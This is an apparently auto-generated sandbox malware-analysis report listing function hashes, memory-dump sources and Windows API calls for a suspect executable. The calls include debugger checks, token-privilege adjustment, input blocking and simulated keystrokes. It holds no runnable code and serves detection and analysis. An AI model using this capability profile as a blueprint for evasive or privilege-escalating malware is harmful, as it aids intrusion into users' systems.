                                                                                  • Opcode ID: a9c4956120f6f9cd84d6f1fdb2aba50fb07167ad5f0e339a3f0b1bc260603551
                                                                                  • Instruction ID: fa18071fd99f9da118ed18f95c6b4c613ae04d045661a04044c396a8c12400f7
                                                                                  • Opcode Fuzzy Hash: a9c4956120f6f9cd84d6f1fdb2aba50fb07167ad5f0e339a3f0b1bc260603551
                                                                                  • Instruction Fuzzy Hash: F65198B4614B069FC714CF28C484E9AB7E4FF09324F14855EE95A8B3A2DB30ED15CB91
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 001F271A
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F2724
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 001F2731
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: caafcfb39c5c3f56742535502ddbcf191a6e15c2e3f42ed0b13abf8958b1e607
                                                                                  • Instruction ID: 282e2c61b32384b49ad7f8bd679753a014565536890d64658a1c83b640c8f05d
                                                                                  • Opcode Fuzzy Hash: caafcfb39c5c3f56742535502ddbcf191a6e15c2e3f42ed0b13abf8958b1e607
                                                                                  • Instruction Fuzzy Hash: 4D31B47491132CABCB21DF65DC8979DB7B8AF18710F5042EAE81CA7261E7709F818F45
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002351DA
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00235238
                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 002352A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1682464887-0
                                                                                  • Opcode ID: e89a86fda8d82a8f87b5824219f176a323c792cc2e7dbaa346f9e1f6fcbc0c83
                                                                                  • Instruction ID: ee86cecb777782c89add43e9848405a910b76111f9c0d11322f66a64138b8ab7
                                                                                  • Opcode Fuzzy Hash: e89a86fda8d82a8f87b5824219f176a323c792cc2e7dbaa346f9e1f6fcbc0c83
                                                                                  • Instruction Fuzzy Hash: 05314D75A106189FDB00DF54D888EAEBBB4FF58314F148099E8099B352DB31E856CB90
                                                                                  APIs
                                                                                    • Part of subcall function 001DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001E0668
                                                                                    • Part of subcall function 001DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001E0685
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
                                                                                  • GetLastError.KERNEL32 ref: 0022174A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                  • String ID:
                                                                                  • API String ID: 577356006-0
                                                                                  • Opcode ID: 4dae11ac7c73622a15463043ab16e022e2cbbadd6154edc9a8a5739e72bcdf22
                                                                                  • Instruction ID: 0f93bef3e01b8e9dd1ae98e0ae126bd7246ff927e3c82c1ad5ab1410c34d2a37
                                                                                  • Opcode Fuzzy Hash: 4dae11ac7c73622a15463043ab16e022e2cbbadd6154edc9a8a5739e72bcdf22
                                                                                  • Instruction Fuzzy Hash: CF1191B2424305BFD7189F94EC86E6BB7BDEB44725B20852EE05657281EB70BC518A24
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0022D608
                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0022D645
                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0022D650
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 33631002-0
                                                                                  • Opcode ID: d30de9bea053feb92deccc6267b264133a847c88dfafe50d6e2f7844cf575657
                                                                                  • Instruction ID: 5ec7c91018c29e57db524546542d8701b3e52d5a2ae9425ac8c9a71c7ad67481
                                                                                  • Opcode Fuzzy Hash: d30de9bea053feb92deccc6267b264133a847c88dfafe50d6e2f7844cf575657
                                                                                  • Instruction Fuzzy Hash: FD113C75E05328BFDB108F95AC49FAFBBBCEB45B50F108155F918E7290D6704A058BA1
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0022168C
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002216A1
                                                                                  • FreeSid.ADVAPI32(?), ref: 002216B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  • Opcode ID: f9a36f6c1fa8e8c2e649406b45bdfca0eca0d749c26d40630b39d384c20e9419
                                                                                  • Instruction ID: 457c29720a79f1fae03e83258da9425cb160e22f73b989137d4e47eb9eee2442
                                                                                  • Opcode Fuzzy Hash: f9a36f6c1fa8e8c2e649406b45bdfca0eca0d749c26d40630b39d384c20e9419
                                                                                  • Instruction Fuzzy Hash: 6CF0F471950309FFDB00DFE4AC89EAEBBBCEB08605F504565E501E2181E774AA448A54
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000,?,001F28E9), ref: 001E4D09
                                                                                  • TerminateProcess.KERNEL32(00000000,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000,?,001F28E9), ref: 001E4D10
                                                                                  • ExitProcess.KERNEL32 ref: 001E4D22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 6b698cbd7b561460564c29568d072524a14f6e83393bf73e49cdad1d49b25f18
                                                                                  • Instruction ID: f0c3d72a471e72798cce305b59a975c9e244a378c00278cb9eb8a3c253a71cc6
                                                                                  • Opcode Fuzzy Hash: 6b698cbd7b561460564c29568d072524a14f6e83393bf73e49cdad1d49b25f18
                                                                                  • Instruction Fuzzy Hash: 13E09271000A88AFCB11AF95ED09A583B69FBA1792B208054FD198A222DB35DA42CA84
                                                                                  APIs
                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0021D28C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameUser
                                                                                  • String ID: X64
                                                                                  • API String ID: 2645101109-893830106
                                                                                  • Opcode ID: e0e9afc5f790c3d4cfb79b0b9b31cf0e26d4fadb4c3f650d22a4f2e4642a3d37
                                                                                  • Instruction ID: 0fc718bf4d594f84e1262e78868b227c12a64ee9284851a7a00f21e1284c34e0
                                                                                  • Opcode Fuzzy Hash: e0e9afc5f790c3d4cfb79b0b9b31cf0e26d4fadb4c3f650d22a4f2e4642a3d37
                                                                                  • Instruction Fuzzy Hash: FED0C9B481121DEECF94CB90EC88DDAB3BCBB14305F100152F506A2140DB7495488F10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                  • Instruction ID: cf3a9b455bdf7f5f205878bbffb69fccbee93924de63c9f70a4ffd47935387c6
                                                                                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                  • Instruction Fuzzy Hash: 21021D71E006599BDF18CFA9C8906AEFBF1FF48314F254169D919E7380D731A9428BD4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Variable is not of type 'Object'.$p#)
                                                                                  • API String ID: 0-325136193
                                                                                  • Opcode ID: 0453f4d011798cbac27b1d55f1c6809a58db4b86de82848df0278597272f20a1
                                                                                  • Instruction ID: a25a23856ed80882ebf974798ddfba1e28f665d16a895856b6f0484feafd5a7d
                                                                                  • Opcode Fuzzy Hash: 0453f4d011798cbac27b1d55f1c6809a58db4b86de82848df0278597272f20a1
                                                                                  • Instruction Fuzzy Hash: 6E3269709102199BCF14DF94D885FEDB7B5BF25304F14805DE80AAB292DB75EE86CBA0
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00236918
                                                                                  • FindClose.KERNEL32(00000000), ref: 00236961
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: 04f57249fe2b5cb079c40b8075e8a552a4722665f784063c48cb964ab1f51eeb
                                                                                  • Instruction ID: bd67534e48e790f9e0f3eb1ee16333560d7d502ba48d4e7cdc258bf3e427c7c5
                                                                                  • Opcode Fuzzy Hash: 04f57249fe2b5cb079c40b8075e8a552a4722665f784063c48cb964ab1f51eeb
                                                                                  • Instruction Fuzzy Hash: 4411BE71614201AFC710CF29D489B26BBE4EF84328F14C69DE8698F6A2C730EC05CB90
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00244891,?,?,00000035,?), ref: 002337E4
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00244891,?,?,00000035,?), ref: 002337F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: fbe07195eec2c265e39d2fab589660bab12255bd2f5f0f6a8a7b269c7f5dc92f
                                                                                  • Instruction ID: 14f2f20c52783703033d842159897e6036283b3f2dc77f02369a79238fac3827
                                                                                  • Opcode Fuzzy Hash: fbe07195eec2c265e39d2fab589660bab12255bd2f5f0f6a8a7b269c7f5dc92f
                                                                                  • Instruction Fuzzy Hash: 75F0E5B06143292AE72057669C4DFEB7AAEEFC4B61F000165F509D2691DA709A04C7B0
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0022B25D
                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0022B270
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: InputSendkeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 3536248340-0
                                                                                  • Opcode ID: 93d622b4995f109ae38b147009b0c65141de9a8db2561413c02e0c9f9438fd43
                                                                                  • Instruction ID: 042176d458a4952f7fa36435756fd3737ee49c3be67aabc42ae692356dcd46b6
                                                                                  • Opcode Fuzzy Hash: 93d622b4995f109ae38b147009b0c65141de9a8db2561413c02e0c9f9438fd43
                                                                                  • Instruction Fuzzy Hash: BAF01D7181434EAFDB059FA0D805BEE7FB4FF08305F108009F955A5192D3798611DF94
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002211FC), ref: 002210D4
                                                                                  • CloseHandle.KERNEL32(?,?,002211FC), ref: 002210E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: 0fed602b98d59f63812ade818f6519c78ec6173b920f502531fc373c889a4f88
                                                                                  • Instruction ID: 1459e3180b03a526963d0b69c6fa73476ff3f6a47ba8ddff2ba73d6fafda3fcd
                                                                                  • Opcode Fuzzy Hash: 0fed602b98d59f63812ade818f6519c78ec6173b920f502531fc373c889a4f88
                                                                                  • Instruction Fuzzy Hash: 98E04F32018710BEE7252B51FC09E7377A9EB04311B20892EF4A6804B1DB726CA0DB54
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001F6766,?,?,00000008,?,?,001FFEFE,00000000), ref: 001F6998
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 372d10f703f5832d124f60877ff4d04eb1837b0b813896ad111bdaa873b23c09
                                                                                  • Instruction ID: b83be9a2548de0c36bebe5efdbd66812af8d9be4d037ceaf1217950a78812ede
                                                                                  • Opcode Fuzzy Hash: 372d10f703f5832d124f60877ff4d04eb1837b0b813896ad111bdaa873b23c09
                                                                                  • Instruction Fuzzy Hash: 45B14D31610609DFD719CF28C48AB657BE0FF45368F29865CEA99CF2A2C375E991CB40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: fab62323a914eea30012b0dbfe95b4ec010069201a07e19f2c4f288f5946e8d2
                                                                                  • Instruction ID: 136064460bd1c343056588effb2ccb282f91234140a1050cfbfc7cecfa7eb465
                                                                                  • Opcode Fuzzy Hash: fab62323a914eea30012b0dbfe95b4ec010069201a07e19f2c4f288f5946e8d2
                                                                                  • Instruction Fuzzy Hash: C7125E71914229DBCB14CF58C881AEEB7F5FF58710F15819AE84AEB251EB309E91CF90
                                                                                  APIs
                                                                                  • BlockInput.USER32(00000001), ref: 0023EABD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BlockInput
                                                                                  • String ID:
                                                                                  • API String ID: 3456056419-0
                                                                                  • Opcode ID: 00231e24086372285afc5e09700279a7c11559ffee7075b80b483e5701728aef
                                                                                  • Instruction ID: 1d176680d09e68787947c32ed41658ea59fb8c14a24289c58954f7ec3971ec6a
                                                                                  • Opcode Fuzzy Hash: 00231e24086372285afc5e09700279a7c11559ffee7075b80b483e5701728aef
                                                                                  • Instruction Fuzzy Hash: 9FE04F712102059FC710EF59E845E9AF7EDAFA8760F01841AFC49C7391DBB0EC458B90
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001E03EE), ref: 001E09DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 1682d498431d42e15fcd44d31c323096915076d156199cb2e38cfb2a111b2126
                                                                                  • Instruction ID: f2d8f5cade76abe49a4a40dc800ea9e8c36f09495a3e2a7825a0dcf23925d83d
                                                                                  • Opcode Fuzzy Hash: 1682d498431d42e15fcd44d31c323096915076d156199cb2e38cfb2a111b2126
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
